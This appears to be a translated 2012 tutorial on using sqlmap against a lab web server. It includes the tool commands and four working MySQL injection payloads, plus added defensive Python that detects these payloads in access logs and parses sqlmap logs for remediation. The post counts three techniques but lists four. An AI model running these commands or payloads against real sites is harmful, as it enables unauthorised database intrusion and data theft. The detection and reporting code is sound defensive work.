SQLMAP 2
Posted on 2012-9-13 01:25:16
Test whether an injection point exists

  root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1"

It reports:

  GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

Here id is used as the injection parameter. Some URLs look like 1.php?id=1&p=2; you can use -p to specify which parameter to test.
For example:

  root@Dis9Team:~# sqlmap -u "http://5.5.5.8/pen/news.php?id=1" -p id

The output is as follows:
  Place: GET
  Parameter: id
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=1 AND 7964=7964

      Type: error-based
      Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

      Type: UNION query
      Title: MySQL UNION query (NULL) - 2 columns
      Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

      Type: AND/OR time-based blind
      Title: MySQL > 5.0.11 AND time-based blind
      Payload: id=1 AND SLEEP(5)
  ---
  [23:11:50] [INFO] the back-end DBMS is MySQL
  web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
  web application technology: PHP 5.3.3, Apache 2.2.16
  back-end DBMS: MySQL 5.0
  [23:11:50] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

  [*] shutting down at 23:11:50
Explanation of the output

  Place: GET
  Parameter: id

The request method and the parameter through which the injection is passed.

  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1 AND 7964=7964

The name of the injection technique and its payload; there are 3 here, as follows:
  Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=1 AND 7964=7964

      Type: error-based
      Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

      Type: UNION query
      Title: MySQL UNION query (NULL) - 2 columns
      Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

      Type: AND/OR time-based blind
      Title: MySQL > 5.0.11 AND time-based blind
      Payload: id=1 AND SLEEP(5)
This shows that the target can be injected using 3 techniques.
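From the defender's side, the payload families in the output above (boolean tautology, error-based FLOOR(RAND(0)*2) trick, UNION SELECT, SLEEP-based delay) are exactly what shows up in a web server's access log when sqlmap is run against a site. The following is an added example, not part of the original post: a small Python classifier that decodes each query parameter from constructed Apache combined-format log lines and reports which technique family it matches. The log lines, the client IP 5.5.5.20 and the regex signatures are constructed for this example; the payload texts are the ones the post shows.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Signatures for the four technique families sqlmap reported above.
# Each pattern is matched against the URL-decoded, upper-cased parameter value.
# Order matters: the more specific families are tested first so that a time-based
# or UNION payload is not reported as a plain boolean tautology.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(")),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b")),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)")),
    ("boolean-based blind", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b")),
]

# Apache/nginx combined log format: ip ident user [time] "METHOD target proto" status ...
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not from the original post); the payloads are the
# ones sqlmap printed above, percent-encoded as a browser or sqlmap would send them.
LOG_LINES = [
    '5.5.5.20 - - [13/Sep/2012:23:11:40 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 512',
    '5.5.5.20 - - [13/Sep/2012:23:11:41 +0800] "GET /pen/news.php?id=1%20AND%207964%3D7964 HTTP/1.1" 200 512',
    '5.5.5.20 - - [13/Sep/2012:23:11:42 +0800] "GET /pen/news.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512',
    '5.5.5.20 - - [13/Sep/2012:23:11:43 +0800] "GET /pen/news.php?id=1%20LIMIT%200,1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)%23 HTTP/1.1" 200 640',
    '5.5.5.21 - - [13/Sep/2012:23:12:00 +0800] "GET /pen/news.php?id=2&p=3 HTTP/1.1" 200 498',
]


def classify_value(value: str):
    """Return the technique family a single parameter value matches, or None."""
    # parse_qsl already decodes once; decoding again also catches double-encoded values.
    decoded = unquote_plus(value).upper()
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return None


def scan_access_log(lines):
    """Return (client_ip, parameter_name, technique) for every request carrying an injection-style value."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            technique = classify_value(value)
            if technique:
                hits.append((m.group("ip"), name, technique))
    return hits


if __name__ == "__main__":
    for ip, param, technique in scan_access_log(LOG_LINES):
        print(f"{ip}  param={param}  {technique}")
```

Running it lists three hits from 5.5.5.20 on parameter id (boolean, time-based and UNION), while the ordinary requests produce nothing. The same classifier can be fed the error-based payload directly, which matches through the FLOOR(RAND(0)*2) signature; a real deployment would add rate-based alerting on one client producing many such hits in a short window, which is the signature of an automated scan rather than a single probe.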
  [23:11:50] [INFO] the back-end DBMS is MySQL
  web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
  web application technology: PHP 5.3.3, Apache 2.2.16
  back-end DBMS: MySQL 5.0
Operating system version
Web server version
Web application version
Database version

  [23:11:50] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

Where the results are saved:
  root@Dis9Team:~# cd /pen/sql/sqlmap/output/5.5.5.8/
  root@Dis9Team:/pen/sql/sqlmap/output/5.5.5.8# ls
  log  session.sqlite  target.txt
  root@Dis9Team:/pen/sql/sqlmap/output/5.5.5.8#
Take a look at the data:
  root@Dis9Team:/pen/sql/sqlmap/output/5.5.5.8# cat log
  sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
  ---
  Place: GET
  Parameter: id
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: id=1 AND 7964=7964

      Type: error-based
      Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

      Type: UNION query
      Title: MySQL UNION query (NULL) - 2 columns
      Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

      Type: AND/OR time-based blind
      Title: MySQL > 5.0.11 AND time-based blind
      Payload: id=1 AND SLEEP(5)
The next time the same URL is given, sqlmap reads the result from here instead of testing again.
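Because the `log` file under the output directory is plain text with a fixed Place / Parameter / Type / Title / Payload layout, it is easy to turn into structured findings for a report or a ticket. The following is an added example, not code from the original post or from the sqlmap project: a Python parser for that layout, fed a constructed copy of the log shown above (the request count of 20 and the four entries are the page's own values). It assumes the older single-indent format printed on this page; newer sqlmap versions use a similar but not identical layout, so the header regex and field names are assumptions to check against your own output.

```python
import re
from collections import defaultdict

# Constructed copy of the `log` file shown on this page (not read from disk here).
SAMPLE_LOG = """sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7964=7964

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
"""

HEADER_RE = re.compile(r"a total of (\d+) HTTP\(s\) requests")


def request_count(text):
    """Number of HTTP requests sqlmap reported in the log header, or None if absent."""
    m = HEADER_RE.search(text)
    return int(m.group(1)) if m else None


def parse_sqlmap_log(text):
    """Parse the injection-point section into one dict per Type/Title/Payload entry.

    Place and Parameter lines apply to every entry that follows them until the
    next Place/Parameter pair, which is how sqlmap groups its output.
    """
    findings = []
    place = parameter = None
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Place:"):
            place = line.split(":", 1)[1].strip()
        elif line.startswith("Parameter:"):
            parameter = line.split(":", 1)[1].strip()
        elif line.startswith("Type:"):
            current = {
                "place": place,
                "parameter": parameter,
                "type": line.split(":", 1)[1].strip(),
                "title": None,
                "payload": None,
            }
            findings.append(current)
        elif line.startswith("Title:") and current is not None:
            current["title"] = line.split(":", 1)[1].strip()
        elif line.startswith("Payload:") and current is not None:
            current["payload"] = line.split(":", 1)[1].strip()
    return findings


def summarize(findings):
    """Map (place, parameter) -> sorted list of technique types, for a one-line-per-parameter summary."""
    grouped = defaultdict(set)
    for f in findings:
        grouped[(f["place"], f["parameter"])].add(f["type"])
    return {key: sorted(types) for key, types in grouped.items()}


if __name__ == "__main__":
    findings = parse_sqlmap_log(SAMPLE_LOG)
    print(f"{request_count(SAMPLE_LOG)} requests, {len(findings)} injection techniques")
    for (place, param), types in summarize(findings).items():
        print(f"{place} parameter '{param}': {', '.join(types)}")
```

On the sample log this yields four entries for the GET parameter id, which is what a remediation ticket needs: which parameter, which request location, and which technique families confirmed it, without the raw payload noise. Counting entries rather than trusting the prose summary also makes it obvious when a write-up and the log disagree.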